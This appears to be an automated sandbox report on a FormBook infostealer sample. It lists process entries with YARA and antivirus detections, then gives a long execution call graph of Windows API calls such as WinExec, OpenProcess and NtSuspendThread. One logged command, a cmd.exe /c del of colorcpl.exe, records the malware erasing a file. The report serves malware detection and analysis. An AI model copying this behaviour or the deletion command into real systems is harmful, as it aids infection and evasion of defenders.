                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:moderate

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:18:24:05
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Windows\explorer.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                              Imagebase:0x7ff69bc80000
                                                                                              File size:3933184 bytes
                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:3
                                                                                              Start time:18:24:14
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Users\Public\Libraries\Mwqrxeuz.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\Public\Libraries\Mwqrxeuz.exe"
                                                                                              Imagebase:0x7ff7fcd70000
                                                                                              File size:750592 bytes
                                                                                              MD5 hash:EDB1382C354EC6C09C53473E5335703A
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:Borland Delphi
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 36%, ReversingLabs
                                                                                              Reputation:low

                                                                                              General

                                                                                              Target ID:4
                                                                                              Start time:18:24:18
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\System32\colorcpl.exe
                                                                                              Imagebase:0x1140000
                                                                                              File size:86528 bytes
                                                                                              MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:moderate

                                                                                              General

                                                                                              Target ID:9
                                                                                              Start time:18:25:26
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Windows\SysWOW64\raserver.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\raserver.exe
                                                                                              Imagebase:0x870000
                                                                                              File size:108544 bytes
                                                                                              MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Reputation:moderate

                                                                                              General

                                                                                              Target ID:10
                                                                                              Start time:18:25:37
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:/c del "C:\Windows\SysWOW64\colorcpl.exe"
                                                                                              Imagebase:0x11d0000
                                                                                              File size:232960 bytes
                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Target ID:11
                                                                                              Start time:18:25:38
                                                                                              Start date:29/11/2022
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7fcd70000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:18.1%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:30.6%
                                                                                                Total number of Nodes:1641
                                                                                                Total number of Limit Nodes:18
                                                                                                execution_graph 19053 218ec3c 19056 2189128 19053->19056 19057 2189130 19056->19057 19057->19057 20061 2173024 QueryPerformanceCounter 19057->20061 19059 2189151 19060 218915b InetIsOffline 19059->19060 19061 2189165 19060->19061 19062 2189176 19060->19062 20073 21748f4 19061->20073 19065 2189180 InetIsOffline 19062->19065 19064 2189174 19066 21891aa 19064->19066 19067 218918a 19065->19067 19068 218919b 19065->19068 20064 2174c24 19066->20064 19069 21748f4 11 API calls 19067->19069 19070 21748f4 11 API calls 19068->19070 19069->19064 19070->19066 20062 2173031 20061->20062 20063 217303c GetTickCount 20061->20063 20062->19059 20063->19059 20065 2174c35 20064->20065 20066 2174c72 20065->20066 20067 2174c5b 20065->20067 20088 2174964 20066->20088 20079 2174f90 20067->20079 20070 2174c68 20071 2174ca3 20070->20071 20072 21748f4 11 API calls 20070->20072 20072->20071 20074 2174908 20073->20074 20075 21748f8 20073->20075 20076 2174936 20074->20076 20078 2172c5c 11 API calls 20074->20078 20075->20074 20077 2174964 11 API calls 20075->20077 20076->19064 20077->20074 20078->20076 20080 2174f9d 20079->20080 20087 2174fcd 20079->20087 20082 2174fc6 20080->20082 20084 2174fa9 20080->20084 20085 2174964 11 API calls 20082->20085 20083 2174fb7 20083->20070 20093 2172c74 20084->20093 20085->20087 20100 21748a0 20087->20100 20089 217498c 20088->20089 20090 2174968 20088->20090 20089->20070 20145 2172c40 20090->20145 20092 2174975 20092->20070 20094 2172c7a 20093->20094 20094->20083 20095 2172cf5 20094->20095 20096 2172c8c 20094->20096 20104 217676c 20094->20104 20112 2172cc4 20095->20112 20096->20083 20101 21748a6 20100->20101 20102 21748c1 20100->20102 20101->20102 20138 2172c5c 20101->20138 20102->20083 20105 21767a1 TlsGetValue 20104->20105 20106 217677b 20104->20106 20107 2176786 20105->20107 20108 21767ab 20105->20108 20106->20095 20115 21766a0 20107->20115 20108->20095 20110 217678b TlsGetValue 20111 217679a 20110->20111 20111->20095 20122 2174888 20112->20122 20116 21766a6 20115->20116 20120 21766ca 20116->20120 20121 217668c LocalAlloc 20116->20121 20118 21766c6 20119 21766d6 TlsSetValue 20118->20119 20118->20120 20119->20120 20120->20110 20121->20118 20125 21747ac 20122->20125 20126 21747c0 20125->20126 20128 21747e7 20126->20128 20132 2174720 20126->20132 20129 2174833 FreeLibrary 20128->20129 20130 2174857 ExitProcess 20128->20130 20129->20128 20133 2174781 20132->20133 20134 217472a GetStdHandle WriteFile GetStdHandle WriteFile 20132->20134 20136 217479d 20133->20136 20137 217478a MessageBoxA 20133->20137 20134->20128 20136->20128 20137->20136 20139 2172c6a 20138->20139 20140 2172c60 20138->20140 20139->20102 20140->20139 20141 2172cf5 20140->20141 20142 217676c 4 API calls 20140->20142 20143 2172cc4 7 API calls 20141->20143 20142->20141 20144 2172d16 20143->20144 20144->20102 20146 2172c57 20145->20146 20148 2172c44 20145->20148 20146->20092 20147 2172c4e 20147->20092 20148->20147 20149 217676c 4 API calls 20148->20149 20150 2172cf5 20148->20150 20149->20150 20151 2172cc4 7 API calls 20150->20151 20152 2172d16 20151->20152 20152->20092 20153 217cb3f 20154 217cb30 SetErrorMode 20153->20154 20155 2171c9c 20156 2171d34 20155->20156 20157 2171cac 20155->20157 20160 2171d3d 20156->20160 20161 2171f88 20156->20161 20158 2171cf0 20157->20158 20159 2171cb9 20157->20159 20165 2171754 10 API calls 20158->20165 20162 2171cc4 20159->20162 20203 2171754 20159->20203 20164 2171d55 20160->20164 20178 2171e54 20160->20178 20163 217201c 20161->20163 20167 2171fdc 20161->20167 20168 2171f98 20161->20168 20170 2171d5c 20164->20170 20174 2171d78 20164->20174 20179 2171e2c 20164->20179 20186 2171d07 20165->20186 20171 2171fe2 20167->20171 20176 2171754 10 API calls 20167->20176 20172 2171754 10 API calls 20168->20172 20169 2171eac 20173 2171754 10 API calls 20169->20173 20188 2171ec5 20169->20188 20193 2171fb2 20172->20193 20190 2171f5c 20173->20190 20183 2171da9 Sleep 20174->20183 20195 2171dcc 20174->20195 20175 2171d2d 20194 2171ff1 20176->20194 20177 2171ce9 20178->20169 20182 2171e85 Sleep 20178->20182 20178->20188 20180 2171754 10 API calls 20179->20180 20197 2171e35 20180->20197 20181 2171fd7 20182->20169 20187 2171e9f Sleep 20182->20187 20184 2171dc1 Sleep 20183->20184 20183->20195 20184->20174 20185 2171cd1 20185->20177 20227 2171abc 20185->20227 20186->20175 20192 2171abc 8 API calls 20186->20192 20187->20178 20190->20188 20196 2171abc 8 API calls 20190->20196 20191 2171e4d 20192->20175 20193->20181 20198 2171abc 8 API calls 20193->20198 20194->20181 20199 2171abc 8 API calls 20194->20199 20200 2171f80 20196->20200 20197->20191 20201 2171abc 8 API calls 20197->20201 20198->20181 20202 2172014 20199->20202 20201->20191 20204 2171998 20203->20204 20215 217176c 20203->20215 20205 2171968 20204->20205 20206 2171ab0 20204->20206 20210 2171977 Sleep 20205->20210 20214 21719b6 20205->20214 20207 21716b4 VirtualAlloc 20206->20207 20208 2171ab9 20206->20208 20212 21716ef 20207->20212 20213 21716df 20207->20213 20208->20185 20209 217178d 20209->20185 20210->20214 20218 217198d Sleep 20210->20218 20211 217177e 20211->20209 20217 217185c 20211->20217 20221 217183a Sleep 20211->20221 20212->20185 20244 2171674 20213->20244 20222 21715fc VirtualAlloc 20214->20222 20225 21719d4 20214->20225 20215->20211 20216 21717fb Sleep 20215->20216 20216->20211 20220 2171814 Sleep 20216->20220 20226 2171868 20217->20226 20250 21715fc 20217->20250 20218->20205 20220->20215 20221->20217 20223 2171850 Sleep 20221->20223 20222->20225 20223->20211 20225->20185 20226->20185 20228 2171ad1 20227->20228 20229 2171b9c 20227->20229 20230 2171ad7 20228->20230 20235 2171b43 Sleep 20228->20235 20229->20230 20231 2171718 20229->20231 20232 2171bb1 20230->20232 20233 2171ae0 20230->20233 20238 2171b7b Sleep 20230->20238 20234 2171c96 20231->20234 20236 2171674 2 API calls 20231->20236 20242 2171c30 VirtualFree 20232->20242 20243 2171bd4 20232->20243 20233->20177 20234->20177 20235->20230 20237 2171b5d Sleep 20235->20237 20239 2171725 VirtualFree 20236->20239 20237->20228 20238->20232 20240 2171b91 Sleep 20238->20240 20241 217173d 20239->20241 20240->20230 20241->20177 20242->20177 20243->20177 20245 21716b1 20244->20245 20246 217167d 20244->20246 20245->20212 20246->20245 20247 217167f Sleep 20246->20247 20248 2171694 20247->20248 20248->20245 20249 2171698 Sleep 20248->20249 20249->20246 20254 2171590 20250->20254 20252 2171604 VirtualAlloc 20253 217161b 20252->20253 20253->20226 20255 2171530 20254->20255 20255->20252 20256 218f2a4 20266 21767b8 20256->20266 20262 218f2dd 20263 218f2eb GetMessageA 20262->20263 20264 218f2fb 20263->20264 20265 218f2df TranslateMessage DispatchMessageA 20263->20265 20265->20263 20267 21767c3 20266->20267 20275 217455c 20267->20275 20270 2174670 20271 2174677 20270->20271 20273 2174687 20271->20273 20337 2175060 20271->20337 20274 218ec48 timeSetEvent 20273->20274 20274->20262 20276 21745a2 20275->20276 20277 21747ac 20276->20277 20278 217461b 20276->20278 20280 21747dd 20277->20280 20284 21747ee 20277->20284 20289 21744f4 20278->20289 20282 2174720 5 API calls 20280->20282 20283 21747e7 20282->20283 20283->20284 20285 2174833 FreeLibrary 20284->20285 20286 2174857 20284->20286 20285->20284 20287 2174866 ExitProcess 20286->20287 20288 2174860 20286->20288 20288->20287 20290 2174537 20289->20290 20291 2174504 20289->20291 20290->20270 20291->20290 20292 21715fc VirtualAlloc 20291->20292 20294 2175aa8 20291->20294 20292->20291 20295 2175ad4 20294->20295 20296 2175ab8 GetModuleFileNameA 20294->20296 20295->20291 20298 2175d0c GetModuleFileNameA RegOpenKeyExA 20296->20298 20299 2175d8f 20298->20299 20300 2175d4f RegOpenKeyExA 20298->20300 20316 2175b48 GetModuleHandleA 20299->20316 20300->20299 20302 2175d6d RegOpenKeyExA 20300->20302 20302->20299 20304 2175e18 lstrcpynA GetThreadLocale GetLocaleInfoA 20302->20304 20307 2175f32 20304->20307 20308 2175e4f 20304->20308 20305 2175df2 RegCloseKey 20305->20295 20306 2175dd4 RegQueryValueExA 20306->20305 20307->20295 20308->20307 20310 2175e5f lstrlenA 20308->20310 20311 2175e77 20310->20311 20311->20307 20312 2175ec4 20311->20312 20313 2175e9c lstrcpynA LoadLibraryExA 20311->20313 20312->20307 20314 2175ece lstrcpynA LoadLibraryExA 20312->20314 20313->20312 20314->20307 20315 2175f00 lstrcpynA LoadLibraryExA 20314->20315 20315->20307 20317 2175b73 GetProcAddress 20316->20317 20319 2175bb6 20316->20319 20317->20319 20322 2175b87 20317->20322 20318 2175be9 20320 2175cde RegQueryValueExA 20318->20320 20321 2175bfc lstrcpynA 20318->20321 20319->20318 20319->20320 20333 2175b28 20319->20333 20320->20305 20320->20306 20328 2175c1a 20321->20328 20322->20319 20324 2175b9d lstrcpynA 20322->20324 20324->20320 20325 2175cca lstrcpynA 20325->20320 20327 2175b28 CharNextA 20327->20328 20328->20320 20328->20325 20328->20327 20330 2175c36 lstrcpynA FindFirstFileA 20328->20330 20329 2175b28 CharNextA 20329->20318 20330->20320 20331 2175c67 FindClose lstrlenA 20330->20331 20331->20320 20332 2175c89 lstrcpynA lstrlenA 20331->20332 20332->20328 20334 2175b36 20333->20334 20335 2175b42 20334->20335 20336 2175b2e CharNextA 20334->20336 20335->20320 20335->20329 20336->20334 20338 2175087 20337->20338 20339 2175064 20337->20339 20338->20271 20340 2175024 20339->20340 20343 2175077 SysReAllocStringLen 20339->20343 20341 217502a SysFreeString 20340->20341 20342 2175038 20340->20342 20341->20342 20342->20271 20343->20338 20344 2174ff4 20343->20344 20345 21752d0 20344->20345 20346 21752ba SysAllocStringLen 20344->20346 20345->20271 20346->20344 20346->20345 20347 218b807 20348 2174c24 11 API calls 20347->20348 20349 218b827 20348->20349 20760 2174bb0 20349->20760 20351 218b85c 20775 2183690 20351->20775 20356 2174c24 11 API calls 20357 218b8b6 20356->20357 20796 218900c 20357->20796 20360 2174c24 11 API calls 20361 218b922 20360->20361 20362 2174bb0 11 API calls 20361->20362 20363 218b957 20362->20363 20364 2183690 18 API calls 20363->20364 20365 218b97b 20364->20365 20366 2174c24 11 API calls 20365->20366 20367 218b99b 20366->20367 20368 2174bb0 11 API calls 20367->20368 20369 218b9d0 20368->20369 20370 2183690 18 API calls 20369->20370 20371 218b9f4 20370->20371 20372 2174c24 11 API calls 20371->20372 20373 218ba14 20372->20373 20374 2174bb0 11 API calls 20373->20374 20375 218ba49 20374->20375 20376 2183690 18 API calls 20375->20376 20377 218ba6d 20376->20377 20378 2174c24 11 API calls 20377->20378 20379 218ba8d 20378->20379 20380 2174bb0 11 API calls 20379->20380 20381 218bac2 20380->20381 20382 2183690 18 API calls 20381->20382 20383 218bae6 20382->20383 20808 218888c 20383->20808 20386 21748f4 11 API calls 20387 218bb0c 20386->20387 20388 2174c24 11 API calls 20387->20388 20389 218bb2c 20388->20389 20390 2174bb0 11 API calls 20389->20390 20391 218bb61 20390->20391 20392 2183690 18 API calls 20391->20392 20393 218bb85 20392->20393 20394 2174c24 11 API calls 20393->20394 20395 218bba5 20394->20395 20396 2174bb0 11 API calls 20395->20396 20397 218bbda 20396->20397 20398 2183690 18 API calls 20397->20398 20399 218bbfe 20398->20399 20821 2177d88 20399->20821 20404 21748f4 11 API calls 20405 218bc2a 20404->20405 20406 2174c24 11 API calls 20405->20406 20407 218bc4a 20406->20407 20408 2174bb0 11 API calls 20407->20408 20409 218bc7f 20408->20409 20410 2183690 18 API calls 20409->20410 20411 218bca3 20410->20411 20412 2174c24 11 API calls 20411->20412 20413 218bcc3 20412->20413 20414 2174bb0 11 API calls 20413->20414 20415 218bcf8 20414->20415 20416 2183690 18 API calls 20415->20416 20417 218bd1c 20416->20417 20418 2188e04 11 API calls 20417->20418 20419 218bd2c 20418->20419 20834 2188c58 20419->20834 20422 21748f4 11 API calls 20423 218bd4d 20422->20423 20424 2174c24 11 API calls 20423->20424 20425 218bd6d 20424->20425 20426 2174bb0 11 API calls 20425->20426 20427 218bda2 20426->20427 20428 2183690 18 API calls 20427->20428 20429 218bdc6 20428->20429 20430 2174c24 11 API calls 20429->20430 20431 218bde6 20430->20431 20432 2174bb0 11 API calls 20431->20432 20433 218be1b 20432->20433 20434 2183690 18 API calls 20433->20434 20435 218be3f 20434->20435 20436 2174c24 11 API calls 20435->20436 20437 218be5f 20436->20437 20438 2174bb0 11 API calls 20437->20438 20439 218be94 20438->20439 20440 2183690 18 API calls 20439->20440 20442 218beb8 20440->20442 20441 218cdeb 20444 2174c24 11 API calls 20441->20444 20442->20441 20443 2174c24 11 API calls 20442->20443 20446 218beed 20443->20446 20445 218ce0b 20444->20445 20447 2174bb0 11 API calls 20445->20447 20983 21780f8 20446->20983 20449 218ce40 20447->20449 20453 2183690 18 API calls 20449->20453 20450 218bf10 20450->20441 20987 217811c 20450->20987 20455 218ce64 20453->20455 20454 218bf3b 20456 2174c24 11 API calls 20454->20456 20457 2174c24 11 API calls 20455->20457 20459 218bf5b 20456->20459 20458 218ce84 20457->20458 20460 2174bb0 11 API calls 20458->20460 20461 2174bb0 11 API calls 20459->20461 20462 218ceb9 20460->20462 20463 218bf90 20461->20463 20464 2183690 18 API calls 20462->20464 20465 2183690 18 API calls 20463->20465 20473 218cedd 20464->20473 20466 218bfb4 20465->20466 20467 2174c24 11 API calls 20466->20467 20470 218bfd4 20467->20470 20468 218d6fa 20469 2174c24 11 API calls 20468->20469 20472 218d71a 20469->20472 20471 2174bb0 11 API calls 20470->20471 20476 218c009 20471->20476 20474 2174bb0 11 API calls 20472->20474 20473->20468 20475 2174c24 11 API calls 20473->20475 20478 218d74f 20474->20478 20479 218cf3c 20475->20479 20477 2183690 18 API calls 20476->20477 20482 218c02d 20477->20482 20480 2183690 18 API calls 20478->20480 20481 2174bb0 11 API calls 20479->20481 20483 218d773 20480->20483 20487 218cf71 20481->20487 20991 2177c4c 20482->20991 20484 2174c24 11 API calls 20483->20484 20488 218d793 20484->20488 20489 2183690 18 API calls 20487->20489 20493 2174bb0 11 API calls 20488->20493 20490 218cf95 20489->20490 20492 2174c24 11 API calls 20490->20492 20491 2174c24 11 API calls 20498 218c092 20491->20498 20495 218cfb5 20492->20495 20494 218d7c8 20493->20494 20496 2183690 18 API calls 20494->20496 20497 2174bb0 11 API calls 20495->20497 20507 218d7ec 20496->20507 20500 218cfea 20497->20500 20499 218d8ef 20501 2174c24 11 API calls 20499->20501 20502 2183690 18 API calls 20500->20502 20505 218d90f 20501->20505 20503 218d00e 20502->20503 20504 2174bb0 11 API calls 20503->20504 20506 218d026 20504->20506 20508 2174bb0 11 API calls 20505->20508 20509 218d031 WinExec Sleep 20506->20509 20507->20499 20510 218d835 InetIsOffline 20507->20510 20517 218d944 20508->20517 20511 2174c24 11 API calls 20509->20511 20512 218d83f 20510->20512 20513 218d850 20510->20513 20518 218d061 20511->20518 20514 21748f4 11 API calls 20512->20514 20515 2174c24 11 API calls 20513->20515 20516 218d84e 20514->20516 20524 218d870 20515->20524 20995 2172fc4 20516->20995 20520 2183690 18 API calls 20517->20520 20523 2174bb0 11 API calls 20518->20523 20522 218d968 20520->20522 20526 2174c24 11 API calls 20522->20526 20530 218d096 20523->20530 20528 2174bb0 11 API calls 20524->20528 20525 2174dbc 11 API calls 20527 218d8e7 20525->20527 20531 218d988 20526->20531 21005 2183990 20527->21005 20532 218d8a5 20528->20532 20533 2183690 18 API calls 20530->20533 20534 2174bb0 11 API calls 20531->20534 20532->20516 20537 2183690 18 API calls 20532->20537 20535 218d0ba 20533->20535 20538 218d9bd 20534->20538 20536 2174c24 11 API calls 20535->20536 20539 218d0da 20536->20539 20537->20516 20540 2183690 18 API calls 20538->20540 20541 2174bb0 11 API calls 20539->20541 20547 218d9e1 20540->20547 20544 218d10f 20541->20544 20542 218dacd 20543 2174c24 11 API calls 20542->20543 20546 218daed 20543->20546 20545 2183690 18 API calls 20544->20545 20549 218d133 20545->20549 20548 2174bb0 11 API calls 20546->20548 20547->20542 20550 218da2a InetIsOffline 20547->20550 20557 218db22 20548->20557 20839 21857d0 20549->20839 20551 218da34 20550->20551 20552 218da45 20550->20552 20555 21748f4 11 API calls 20551->20555 20554 2174c24 11 API calls 20552->20554 20562 218da65 20554->20562 20558 218da43 20555->20558 20560 2183690 18 API calls 20557->20560 20561 2174dbc 11 API calls 20558->20561 20559 2174c24 11 API calls 20567 218d17a 20559->20567 20563 218db46 20560->20563 20564 218dac8 20561->20564 20568 2174bb0 11 API calls 20562->20568 20565 2174c24 11 API calls 20563->20565 21132 21848a0 20564->21132 20570 218db66 20565->20570 20569 2174bb0 11 API calls 20567->20569 20571 218da9a 20568->20571 20573 218d1af 20569->20573 20572 2174bb0 11 API calls 20570->20572 20571->20558 20574 2183690 18 API calls 20571->20574 20577 218db9b 20572->20577 20575 2183690 18 API calls 20573->20575 20574->20558 20576 218d1d3 20575->20576 20578 2174c24 11 API calls 20576->20578 20579 2183690 18 API calls 20577->20579 20582 218d1f3 20578->20582 20580 218dbbf 20579->20580 20581 2174c24 11 API calls 20580->20581 20584 218dbdf 20581->20584 20583 2174bb0 11 API calls 20582->20583 20586 218d228 20583->20586 20585 2174bb0 11 API calls 20584->20585 20589 218dc14 20585->20589 20587 2183690 18 API calls 20586->20587 20588 218d24c OpenProcess 20587->20588 20590 2174c24 11 API calls 20588->20590 20591 2183690 18 API calls 20589->20591 20592 218d283 20590->20592 20593 218dc38 20591->20593 20594 2174bb0 11 API calls 20592->20594 20595 2183690 18 API calls 20593->20595 20596 218d2b8 20594->20596 20597 218dc6b 20595->20597 20598 2183690 18 API calls 20596->20598 20600 2183690 18 API calls 20597->20600 20599 218d2dc 20598->20599 20601 2174c24 11 API calls 20599->20601 20602 218dc9e 20600->20602 20604 218d2fc 20601->20604 20603 2174c24 11 API calls 20602->20603 20605 218dcbe 20603->20605 20606 2174bb0 11 API calls 20604->20606 20607 2174bb0 11 API calls 20605->20607 20608 218d331 20606->20608 20609 218dcf3 20607->20609 20610 2183690 18 API calls 20608->20610 20612 2183690 18 API calls 20609->20612 20611 218d355 NtSuspendThread 20610->20611 20613 2174c24 11 API calls 20611->20613 20614 218dd17 20612->20614 20615 218d380 20613->20615 20616 2183690 18 API calls 20614->20616 20617 2174bb0 11 API calls 20615->20617 20618 218dd4a 20616->20618 20619 218d3b5 20617->20619 20620 2183690 18 API calls 20618->20620 20621 2183690 18 API calls 20619->20621 20622 218dd7d 20620->20622 20623 218d3d9 20621->20623 20624 2174c24 11 API calls 20622->20624 20625 2174c24 11 API calls 20623->20625 20626 218dd9d 20624->20626 20627 218d3f9 20625->20627 20628 2174bb0 11 API calls 20626->20628 20629 2174bb0 11 API calls 20627->20629 20630 218ddd2 20628->20630 20631 218d42e 20629->20631 20632 2183690 18 API calls 20630->20632 20633 2183690 18 API calls 20631->20633 20634 218ddf6 20632->20634 20635 218d452 20633->20635 20636 2174c24 11 API calls 20634->20636 20637 2174c24 11 API calls 20635->20637 20638 218de16 20636->20638 20639 218d472 20637->20639 20640 2174bb0 11 API calls 20638->20640 20641 2174bb0 11 API calls 20639->20641 20642 218de4b 20640->20642 20643 218d4a7 20641->20643 20644 2183690 18 API calls 20642->20644 20645 2183690 18 API calls 20643->20645 20646 218de6f 20644->20646 20647 218d4cb 20645->20647 20648 2174c24 11 API calls 20646->20648 20649 218d4d5 InetIsOffline 20647->20649 20654 218de8f 20648->20654 20650 218d4df 20649->20650 20651 218d4f0 20649->20651 20653 21748f4 11 API calls 20650->20653 20652 2174c24 11 API calls 20651->20652 20658 218d510 20652->20658 20655 218d4ee 20653->20655 20656 2174bb0 11 API calls 20654->20656 20657 2174c24 11 API calls 20655->20657 20660 218dec4 20656->20660 20661 218d589 20657->20661 20659 2174bb0 11 API calls 20658->20659 20665 218d545 20659->20665 20662 2183690 18 API calls 20660->20662 20663 2174bb0 11 API calls 20661->20663 20664 218dee8 20662->20664 20668 218d5be 20663->20668 20666 2174c24 11 API calls 20664->20666 20665->20655 20667 2183690 18 API calls 20665->20667 20669 218df08 20666->20669 